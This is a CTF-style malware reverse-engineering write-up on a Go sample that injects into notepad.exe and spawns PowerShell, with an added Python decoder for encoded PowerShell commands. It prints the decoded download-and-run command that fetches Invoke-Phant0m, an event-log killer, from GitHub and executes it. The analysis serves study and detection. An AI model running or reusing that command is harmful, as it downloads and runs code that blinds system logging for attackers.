Reverse Engineering - Another Injection

I ran the sample with the following tools active to get information about the sample for the following questions:

  • FakeNet
  • Process Monitor
  • Process Explorer

  1. What is the language the program is written in? (1 point)

    Running strings on the binary shows that it is written in Go.

    Answer: Golang

  2. What is the build ID? (1 point)

    Running strings on the binary shows the text Go build ID: "eck19EyXq_9c975RxNJ1/QkbhfvYWoTcAeJreFwhX/q3HwQW17YdD3iMlLFCzB/1ZpNy-9ah0QEvzlOTFcq".

    Answer: eck19EyXq_9c975RxNJ1/QkbhfvYWoTcAeJreFwhX/q3HwQW17YdD3iMlLFCzB/1ZpNy-9ah0QEvzlOTFcq

  3. What is the dependency package the sample uses for invoking Windows APIs? (1 point)

    Uploading the sample to VirusTotal shows that it uses the github.com/TheTitanrain/w32 package.

    Answer: github.com/TheTitanrain/w32

  4. What is the victim process? (Hint: 32bit) (2 points)

    Answer: notepad.exe

  5. What is the process invoked from the shellcode? (1 point)

    Answer: powershell.exe

  6. What is the name of the created file? (2 points)

    Command (in Linux): strings main.exe | grep powershell

    The matching string carries a base64 argument; decoding it with the CyberChef recipe From Base64 ~> Decode text (UTF-16LE) gives the PowerShell command:

    Invoke-WebRequest "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/master/Invoke-Phant0m.ps1" -OutFile "C:\Windows\Temp\change.ps1"; Import-Module C:\Windows\Temp\change.ps1;Invoke-Phant0m;

    Answer: C:\Windows\Temp\change.ps1
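    As an added example (not part of the write-up), the decoding step above as a Python script: it locates a powershell -enc argument in a binary blob, base64-decodes it as UTF-16LE, and pulls out the -OutFile path and the function invoked after Import-Module. The blob is constructed here from the command shown above, not read from main.exe.

```python
import base64
import re
from typing import List, Optional

# Constructed stand-in for the binary: the decoded PowerShell command from the
# write-up, re-encoded as UTF-16LE base64 (the -EncodedCommand format) and
# padded with junk bytes. This is NOT the real main.exe.
DECODED_CMD = (
    'Invoke-WebRequest "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/'
    'master/Invoke-Phant0m.ps1" -OutFile "C:\\Windows\\Temp\\change.ps1"; '
    'Import-Module C:\\Windows\\Temp\\change.ps1;Invoke-Phant0m;'
)
SAMPLE_BLOB = (
    b"\x00\x90MZ\x90junk\x00powershell.exe -nop -w hidden -enc "
    + base64.b64encode(DECODED_CMD.encode("utf-16-le"))
    + b"\x00\xff\xfemore junk\x00"
)

# A powershell invocation followed by -e / -enc / -encodedcommand and a base64 blob.
ENC_RE = re.compile(
    rb"powershell(?:\.exe)?[^\x00]*?-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)
OUTFILE_RE = re.compile(r'-OutFile\s+"?([^";\s]+)"?', re.IGNORECASE)
INVOKE_RE = re.compile(r"Import-Module\s+[^;]+;\s*([A-Za-z][\w-]+)")


def extract_encoded_commands(blob: bytes) -> List[str]:
    """Return every -EncodedCommand payload found in blob, decoded to text."""
    out = []
    for m in ENC_RE.finditer(blob):
        raw = base64.b64decode(m.group(1), validate=True)
        if len(raw) % 2:  # UTF-16LE text must have an even byte count
            continue
        out.append(raw.decode("utf-16-le"))
    return out


def dropped_file(cmd: str) -> Optional[str]:
    """Path passed to -OutFile, i.e. the file the command writes to disk."""
    m = OUTFILE_RE.search(cmd)
    return m.group(1) if m else None


def invoked_tool(cmd: str) -> Optional[str]:
    """Function called right after the dropped script is imported."""
    m = INVOKE_RE.search(cmd)
    return m.group(1) if m else None


if __name__ == "__main__":
    for cmd in extract_encoded_commands(SAMPLE_BLOB):
        print(cmd)
        print("drops:", dropped_file(cmd))
        print("runs: ", invoked_tool(cmd))
```

    Against a real binary, replace SAMPLE_BLOB with the file's bytes; the same regex approach catches the encoded argument whether it sits in a Go string table or in a resource section.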

  7. What is the name of the actual tool executed? (2 points)

    Answer: Invoke-Phant0m

Tags

  1. sysinternals
  2. disassembly
  3. reverse-engineering
  4. 10 points
  5. easy